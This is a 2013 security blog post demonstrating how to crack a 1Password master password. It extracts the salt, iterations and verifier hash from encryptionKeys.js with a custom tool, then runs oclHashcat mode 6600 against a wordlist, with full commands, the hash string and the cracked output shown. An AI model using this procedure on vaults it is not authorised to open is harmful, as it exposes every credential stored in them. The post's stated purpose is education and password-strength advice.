Friday, April 26, 2013

Cracking the 1Password Master Password


[EDITED 27/08/2013 - Please note the file download below may have missing DLL problems. Please download this version of 1pass2hashcat.exe to extract the hash which should work on ALL Windows versions]

It has become apparent in recent weeks that obtaining the 1Password Master Password is possible. This is due not only to an understanding of how 1Password stores the data but also with a new feature in Hashcat (closed beta for now) that allows you to crack 1Password hashes. 

Firstly, 1Password is correct when they say that they do not store the master password. However, as with any form of access control, they store other data that is used to verify the password you entered as being the master password. It is with this data that one can crack a 1Password master password.


The below demonstration is for educational purposes only. 
I take no responsibility for how this tool is used.
Please use it only for data which you are authorized to access!

Step 1

We need to obtain the relevant information from the file that 1Password uses to store the validation hashes, iteration numbers and actual salt data etc. 

In Windows this file is stored in encryptionKeys.js in the primary 1Password directory.

Once we have that, we can retrieve the following information we need - the iterations, salt and verifier hash -note that this requires some calculation and conversion. 

I've built a utility to do that for us; called 1pass2hashcat.exe (click it to download it)

Lets first do a test to make sure our file is ok and our required data comes out ok:

mirage:~ rurapenthe$ ./1pass2hashcat.exe encryptionKeys.js -t
Entering self-test mode..
Checking computational arrangement..
Success! Salt is 16 bytes, Hash is 2080 bytes.
mirage:~ rurapenthe$ 

So we can see that our file is OK. We converted and extracted a salt and hash and iterations and the numbers checked-out.

Step 2

Now we need to generate our actual output data from hashcat. If i re-run the program without the -t it will output the data we need:

mirage:~ rurapenthe$ ./1pass2hashcat.exe encryptionKeys.js
10000:5cae0e6d6e7abddc:0ab81178027d2a6f5a220bff2ca1965f6e6da610b63fdac69ea21428e98d9663d97cc094309fa0ea1a24efea0b0db0e335ca9708daa83fc264be43547724a803b5fc22735223466fb52ddc7cc7da77f5060211d5f6d41c2a2f8b7e83dd97f065030197e40930f00a264a792dcf493a4ed6921b34be5622a43d0c4361ebb804821f49882d100fa5965ec8adc7ff28e053edd5ad448c82367069fd7c659262c872e58d2201c313c593c3786e26c23521a5db64f50f4cb0185f135c7bc53415a648d969818b35fecb665472aa6751f4dc7a27690cae9ed614f92004bb1d42d5bd6346de86548dedacbbd542d7e29567a575065442fd5cae94d9a1eb694b1d4ee23ac3a9f0dc348286ea767b4e3fcb230f77a6ff04f8704cf093d8b2f0438be2a10bf63c76152012b6dc5b167eb32a534597d7cf3dd49b7527c1dbf30a9caad7f6cfaef8f9e25588264b0ae8ab9444d83a1bffad4556e703f47729107ea6733cd3eac64762c762d14fcbecc86cc49b10bc1f471050cb748d4e50ce61608426694ce6624e88beb349df8a5f9359fe57dd4d43ae18cd1b50a0e5c214a03d9d27d8c813501b861b204d0f454dd708697a78070d5aa39a75a0a58dd6db78bde6b854fe16c21748110056e4bf5bf7cd147c15a709b6c8d1ba1525e2514fd593b24bbc4537b6187e026ed65eb76ba1b4b76b62683b51a0b2f6d336620b85d9bce388ce476bccdc8c67b517d99a0e4ff1ebcb445b4ca65bdeef2f020385a4bb9378eff96c63c86e3803b6ec945e2dfd2d7519b77f1a48bdfe4a7360759c0650ecdb6f01b513deda102f6c684f85b09e9c828c956f9ba1cd8f6f3b11ad0f0afa32273f2c756f7d14d4f5a759dd18ade4afe345f28bb52b6dea88279fba15a98cb3dfc5d5fe70d18de9d06d56c86be1a9f64a6b2340f480520ab23c0905a0295d37d49d591ea6ff91124852b9011cc66aacb7694ffe94eb9be3145cc05a2fc088bfdb0dff7a9b74f3ecf78e21ed0992230aa15977e113df51d54e284b3379438095077d7eeedd6db959a7a32a8d60dd7646d1a66405f2036ed32f68de7442d60dbde7ec40c314ac8fe55216b6c895400392406bb2af8d88ef46e15e60cfc23374876470f0d9f175b54e4fdea6979e997c94505aaa6d112692cd8256db8019c0ae69ef25ed1436dbe68f66c05ae3d4f97be6304facc3f3395b9794d9f84b35a846e0d7460f5b2c2067bf95f9eae3bba106ec68efb1a93564303712ef5da243b994f5340a39ae2f09e9e987b487aa827dd8fa8917ac93276af75a21a1d1493c61239a581e0283767c56bc11a6796c631eb5e5f2faaceee54607701138a74350e598e6508d3a371ebab5638a4bf5f300fba077ebb46130c2a1d2e1eb88b9dd9c6f7a24a9b99c28fedbbea2723dfa417e9f78738ce719bd9976b11587e10869a40954ef601fdf0de158d3220b4902fedccfa1015f694d68fc
mirage:~ rurapenthe$ 

Excellent, we have what we need. Our iterations:salt:hash to be used in Hashcat to find our master password. 

As of the current version of 1pass2hashcat the hash is automatically output to 1pass.hash in the current directory.

Step 3

Now we run Hashcat, along with our hash file and against our wordlist and lets see what happens:

[email protected]:~/Cracking/oclHashcat-plus-0.15$ ./oclHashcat-plus64.bin -m 6600 1pass.hash ../NewWordlists/rockyou.txt 

clHashcat-plus v0.15 by atom starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 1
Workload: 16 loops, 8 accel
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: Cayman, 1024MB, 850Mhz, 22MCU
Device #2: Cayman, 512MB, 850Mhz, 22MCU
Device #3: Cypress, 512MB, 850Mhz, 20MCU
Device #4: Cypress, 512MB, 850Mhz, 20MCU
Device #1: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (896456 bytes)
Device #2: Kernel ./kernels/4098/m6600.Cayman_1084.4_1084.4.kernel (896456 bytes)
Device #3: Kernel ./kernels/4098/m6600.Cypress_1084.4_1084.4.kernel (865744 bytes)
Device #4: Kernel ./kernels/4098/m6600.Cypress_1084.4_1084.4.kernel (865744 bytes)

Cache-hit dictionary stats ../NewWordlists/rockyou.txt: 1299888 bytes, 142647 words, 142647 keyspace

WARN: ADL_Overdrive5_FanSpeedInfo_Get(): -1

1pass.hash:%N0stim0n41602               
                                             
Session.Name...: oclHashcat-plus
Status.........: Cracked
Input.Mode.....: File (../NewWordlists/rockyou.txt)
Hash.Target....: 1pass.hash
Hash.Type......: 1Password
Time.Started...: Fri Apr 26 14:35:48 2013 (4 secs)
Speed.GPU.#1...:    47176 H/s
Speed.GPU.#2...:    35135 H/s
Speed.GPU.#3...:        0 H/s
Speed.GPU.#4...:        0 H/s
Speed.GPU.#*...:    82312 H/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 141839/142647 (99.43%)
Rejected.......: 1/141839 (0.00%)
HWMon.GPU.#1...:  0% Util, 47c Temp, N/A Fan
HWMon.GPU.#2...:  0% Util, 45c Temp, N/A Fan
HWMon.GPU.#3...:  0% Util, 53c Temp, N/A Fan
HWMon.GPU.#4...:  0% Util, 55c Temp, N/A Fan

As you can see, Hashcat cracked our password! :-)

Lets type that into 1Password and see what happened....



Yay! 1Password has been unlocked.

Conclusion

The moral of the story is simple and applies to any passwords you are ever required to use : Set a strong and long password! 

I again wish to iterate this blog post is for educational purposes and the tool is not to be used for any illegal activities or gaining access to any data you are not fully authorized to access. 

-Dimitri AKA Rurapenthe
Find me on #intern0t or #hashcat on Freenode 
or @Bitcrack_cyber on Twitter
(c) 2013 Bitcrack Cyber Security Pty Ltd